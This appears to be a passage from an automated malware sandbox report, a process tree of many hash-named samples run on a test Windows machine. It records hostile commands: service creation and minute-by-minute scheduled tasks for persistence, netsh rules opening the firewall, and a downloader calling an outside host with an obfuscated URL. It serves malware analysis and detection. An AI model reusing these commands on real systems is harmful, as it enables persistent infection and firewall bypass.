        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4792
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4840
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9588
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7824
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8512
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8312
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7284
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6484
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9104
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5632
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7736
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3992
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7544
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6084
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8900
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1492
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8548
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4264
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1052
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6240
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5724
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:228
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9356
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1496
    - - C:\Program Files (x86)\Sewer\Lashing.exe
        
        "C:\Program Files (x86)\Sewer\Lashing.exe" tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB
        5⤵
        
        PID:5212
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessN"
        5⤵
        
        PID:6652
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessN".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:6808
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingN"
        5⤵
        
        PID:5464
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingN".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:5336
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessA"
        5⤵
        
        PID:6192
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessA".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:6360
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingA"
        5⤵
        
        PID:6460
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingA".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:6728
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\118392.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\118392.exe
        5⤵
        
        PID:5760
    - - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\system32\explorer.exe
        5⤵
        
        PID:3504
  - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
      "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=ajmhcxtfajmhcxtfajmhcxtf4" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\905"
      4⤵
      PID:4644
- C:\Users\Admin\Desktop\2022-10-24\0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d.exe
  "C:\Users\Admin\Desktop\2022-10-24\0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d.exe"
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1724
    3⤵
    - Program crash
    PID:4892
- C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe
  "C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe"
  2⤵
  PID:5100
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yszjavnl\
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:184
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hkteeaax.exe" C:\Windows\SysWOW64\yszjavnl\
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create yszjavnl binPath= "C:\Windows\SysWOW64\yszjavnl\hkteeaax.exe /d\"C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe\"" type= own start= auto DisplayName= "wifi support"
    3⤵
    - Launches sc.exe
    PID:2800
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description yszjavnl "wifi internet conection"
    3⤵
    - Launches sc.exe
    PID:2096
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start yszjavnl
    3⤵
    - Launches sc.exe
    PID:2572
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    - Modifies Windows Firewall
    PID:4832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 784
    3⤵
    - Executes dropped EXE
    - Program crash
    - Modifies data under HKEY_USERS
    PID:2244
- C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe
  "C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe"
  2⤵
  PID:5020
- - C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe
    "C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe"
    3⤵
    PID:4580
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 220
      4⤵
      Program crash
      PID:4544
- C:\Users\Admin\Desktop\2022-10-24\1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe
  "C:\Users\Admin\Desktop\2022-10-24\1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe"
  2⤵
  - Executes dropped EXE
  PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe"
    3⤵
    PID:968
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:4324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\sefanathread"
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c copy "C:\Users\Admin\Desktop\2022-10-24\1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe" "C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
    3⤵
    - Executes dropped EXE
    PID:2528
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
      4⤵
      Creates scheduled task(s)
      PID:3008
- C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe
  "C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe"
  2⤵
  - Executes dropped EXE
  PID:464
- - C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe
    "C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe"
    3⤵
    PID:5032
- C:\Users\Admin\Desktop\2022-10-24\3dcb748a731af578daa96d6c5c023771adb0902c08d090a9ed41227eb8e9d8e8.exe
  "C:\Users\Admin\Desktop\2022-10-24\3dcb748a731af578daa96d6c5c023771adb0902c08d090a9ed41227eb8e9d8e8.exe"
  2⤵
  PID:3688
- C:\Users\Admin\Desktop\2022-10-24\4d51baa13ce9b91eff034899556ba11e23660dd24e3652902c7d7cc2db063b50.exe
  "C:\Users\Admin\Desktop\2022-10-24\4d51baa13ce9b91eff034899556ba11e23660dd24e3652902c7d7cc2db063b50.exe"
  2⤵
  PID:4112
- - C:\Users\Admin\AppData\Local\Temp\is-62O9B.tmp\is-BCHK6.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-62O9B.tmp\is-BCHK6.tmp" /SL4 $120368 "C:\Users\Admin\Desktop\2022-10-24\4d51baa13ce9b91eff034899556ba11e23660dd24e3652902c7d7cc2db063b50.exe" 2323851 52736
    3⤵
    PID:4452
  - - C:\Program Files (x86)\etSearcher\etsearcher58.exe
      "C:\Program Files (x86)\etSearcher\etsearcher58.exe"
      4⤵
      PID:4672
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2022-10-24\4d55c5d9ddf1974f62bbf88a693348bc81ceb8a2b7348b8f71c94455497f90de.js"
  2⤵
  PID:4540
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\qStjrLzNjq.js"
    3⤵
    PID:2544
- C:\Users\Admin\Desktop\2022-10-24\5bfc5adc36e614220e723f03a499372a525bccb1719f621b6edc52d2d2737e32.exe
  "C:\Users\Admin\Desktop\2022-10-24\5bfc5adc36e614220e723f03a499372a525bccb1719f621b6edc52d2d2737e32.exe"
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 1720
    3⤵
    - Program crash
    PID:3604
- C:\Users\Admin\Desktop\2022-10-24\5d954998ba8c1086f196cf2572f0690b97c5fba623d0ca057cea74dd77aae5e0.exe
  "C:\Users\Admin\Desktop\2022-10-24\5d954998ba8c1086f196cf2572f0690b97c5fba623d0ca057cea74dd77aae5e0.exe"
  2⤵
  PID:4832
- - C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe
    "C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe"
    3⤵
    - Executes dropped EXE
    PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe
      "C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe"
      4⤵
      PID:3864
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 504
      4⤵
      Program crash
      PID:1264
- C:\Users\Admin\Desktop\2022-10-24\6cfd1167777006598f5eb5d1c08e1434aefe606dfd983c683a8f14639d56d053.exe
  "C:\Users\Admin\Desktop\2022-10-24\6cfd1167777006598f5eb5d1c08e1434aefe606dfd983c683a8f14639d56d053.exe"
  2⤵
  PID:1492
- - C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe
    "C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe"
    3⤵
    PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe
      "C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe"
      4⤵
      PID:2044
- C:\Users\Admin\Desktop\2022-10-24\8ca8aa7e36b75a4a71e801e655791fb4b7d6efb744a8ba66086a5899959e1096.exe
  "C:\Users\Admin\Desktop\2022-10-24\8ca8aa7e36b75a4a71e801e655791fb4b7d6efb744a8ba66086a5899959e1096.exe"
  2⤵
  PID:4024
- C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe
  "C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe"
  2⤵
  PID:4032
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    PID:4436
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2020
- C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe
  "C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe"
  2⤵
  PID:2724
- C:\Users\Admin\Desktop\2022-10-24\8bd4fc268a7f26a4ff5cad8ff2c97a22b17a2f6cb5b4118f47cad0102d3b155d.exe
  "C:\Users\Admin\Desktop\2022-10-24\8bd4fc268a7f26a4ff5cad8ff2c97a22b17a2f6cb5b4118f47cad0102d3b155d.exe"
  2⤵
  PID:4916
- - C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe
    "C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe"
    3⤵
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe
      "C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe"
      4⤵
      PID:2588
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  PID:2320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Executes dropped EXE
  PID:4580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe27fb46f8,0x7ffe27fb4708,0x7ffe27fb4718
    3⤵
    PID:2252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
    3⤵
    PID:116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
    3⤵
    PID:3560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
    3⤵
    PID:4820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:4356
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
    3⤵
    PID:4860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
    3⤵
    PID:5504
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
    3⤵
    PID:5496
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
    3⤵
    PID:6004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
    3⤵
    PID:5996
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
    3⤵
    PID:5440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
    3⤵
    PID:5764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
    3⤵
    PID:3408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5360 /prefetch:8
    3⤵
    PID:5400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4592 /prefetch:8
    3⤵
    PID:5704
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
    3⤵
    PID:4332
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
    3⤵
    PID:412
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
    3⤵
    PID:5848
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
    3⤵
    PID:7064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
    3⤵
    PID:6864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
